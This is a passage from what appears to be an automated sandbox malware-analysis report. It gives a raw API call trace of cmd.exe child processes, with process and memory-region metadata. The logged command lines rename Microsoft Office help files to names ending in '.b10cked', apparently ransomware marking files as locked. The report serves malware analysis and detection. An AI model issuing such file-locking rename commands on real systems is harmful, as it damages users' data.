lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x40, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x1, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x0, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x4, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x4) returned 0x0 [0205.384] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e7f4, lpData=0x22e7f8, lpcbData=0x22e7f0*=0x1000 | out: lpType=0x22e7f4*=0x0, lpData=0x22e7f8*=0x9, lpcbData=0x22e7f0*=0x1000) returned 0x2 [0205.384] RegCloseKey (hKey=0x40) returned 0x0 [0205.384] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.384] srand (_Seed=0x5b8863a7) [0205.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" [0205.384] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked\"" [0205.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3618f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.385] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.385] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.385] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.385] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.385] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.385] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.385] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.385] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.385] GetEnvironmentStringsW () returned 0x3622e0* [0205.385] FreeEnvironmentStringsW (penv=0x3622e0) returned 1 [0205.385] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.385] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.385] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.386] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.386] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.386] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.386] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.386] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f5b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f5b8, lpFilePart=0x22f5b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f5b4*="Desktop") returned 0x18 [0205.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f334 | out: lpFindFileData=0x22f334) returned 0x360020 [0205.386] FindClose (in: hFindFile=0x360020 | out: hFindFile=0x360020) returned 1 [0205.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.387] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.387] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.387] GetEnvironmentStringsW () returned 0x362b00* [0205.387] FreeEnvironmentStringsW (penv=0x362b00) returned 1 [0205.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.387] GetConsoleOutputCP () returned 0x1b5 [0205.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.390] GetUserDefaultLCID () returned 0x409 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="0") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="0") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="1") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.391] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.391] GetConsoleTitleW (in: lpConsoleTitle=0x3508e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0205.392] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0205.392] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0205.392] _wcsicmp (_String1="IF", _String2="move") returned -4 [0205.393] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0205.393] _wcsicmp (_String1="REM", _String2="move") returned 5 [0205.393] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0205.396] GetConsoleTitleW (in: lpConsoleTitle=0x22f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.396] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0205.396] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0205.396] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CD") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="REN") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0205.396] _wcsicmp (_String1="move", _String2="SET") returned -6 [0205.396] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0205.396] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="MD") returned 11 [0205.396] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0205.396] _wcsicmp (_String1="move", _String2="RD") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0205.396] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0205.396] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="VER") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0205.397] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0205.397] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0205.397] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0205.397] _wcsicmp (_String1="move", _String2="START") returned -6 [0205.397] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0205.397] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0205.397] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0205.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.398] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f1ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f1a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f1a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0205.399] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0205.399] _wcsicmp (_String1="MSVISI~2.HXN", _String2=".") returned 63 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2="..") returned 63 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~2.hxn")) returned 0x2022 [0205.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", nBufferLength=0x104, lpBuffer=0x22eb34, lpFilePart=0x22eb1c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", lpFilePart=0x22eb1c*="MSVISI~2.HXN") returned 0x27 [0205.400] SetErrorMode (uMode=0x0) returned 0x1 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2=".") returned 63 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2="..") returned 63 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~2.hxn")) returned 0x2022 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", nBufferLength=0x104, lpBuffer=0x22efb0, lpFilePart=0x22ed48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", lpFilePart=0x22ed48*="MSVISI~2.HXN") returned 0x27 [0205.400] SetErrorMode (uMode=0x0) returned 0x1 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.401] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x22f1b8, lpFilePart=0x22ed48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked", lpFilePart=0x22ed48*="MS.VISIO_STD.14.1033.hxn.b10cked") returned 0x3b [0205.401] SetErrorMode (uMode=0x0) returned 0x1 [0205.401] SetLastError (dwErrCode=0x0) [0205.401] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio_std.14.1033.hxn.b10cked")) returned 0xffffffff [0205.401] GetLastError () returned 0x2 [0205.401] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22e6c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6c4) returned 0x350e88 [0205.401] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x22e6c4 | out: lpFindFileData=0x22e6c4) returned 0 [0205.401] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.401] GetLastError () returned 0x12 [0205.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22e6c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6c4) returned 0x350e88 [0205.402] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x22e6c4 | out: lpFindFileData=0x22e6c4) returned 0 [0205.402] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.402] GetLastError () returned 0x12 [0205.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x361bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361bf0) returned 0x350e88 [0205.403] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x361bf0 | out: lpFindFileData=0x361bf0) returned 0 [0205.403] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.403] GetLastError () returned 0x12 [0205.403] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x361bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361bf0) returned 0x350e88 [0205.403] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x361bf0 | out: lpFindFileData=0x361bf0) returned 0 [0205.403] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.403] GetLastError () returned 0x12 [0205.403] _get_osfhandle (_FileHandle=2) returned 0xb [0205.403] GetFileType (hFile=0xb) returned 0x2 [0205.411] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0205.411] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22e894 | out: lpMode=0x22e894) returned 1 [0205.411] _get_osfhandle (_FileHandle=2) returned 0xb [0205.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22e8c8 | out: lpConsoleScreenBufferInfo=0x22e8c8) returned 1 [0205.411] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.412] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22e908 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.412] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x22e8ec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22e8ec*=0x2c) returned 1 [0205.413] longjmp () [0205.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.413] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.413] SetConsoleInputExeNameW () returned 0x1 [0205.413] GetConsoleOutputCP () returned 0x1b5 [0205.413] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.413] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.414] exit (_Code=1) Process: id = "482" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29430 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29431 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29432 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29433 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29434 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29435 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29436 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29437 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29438 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29439 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30199 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30200 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30201 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 30202 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30204 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30205 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 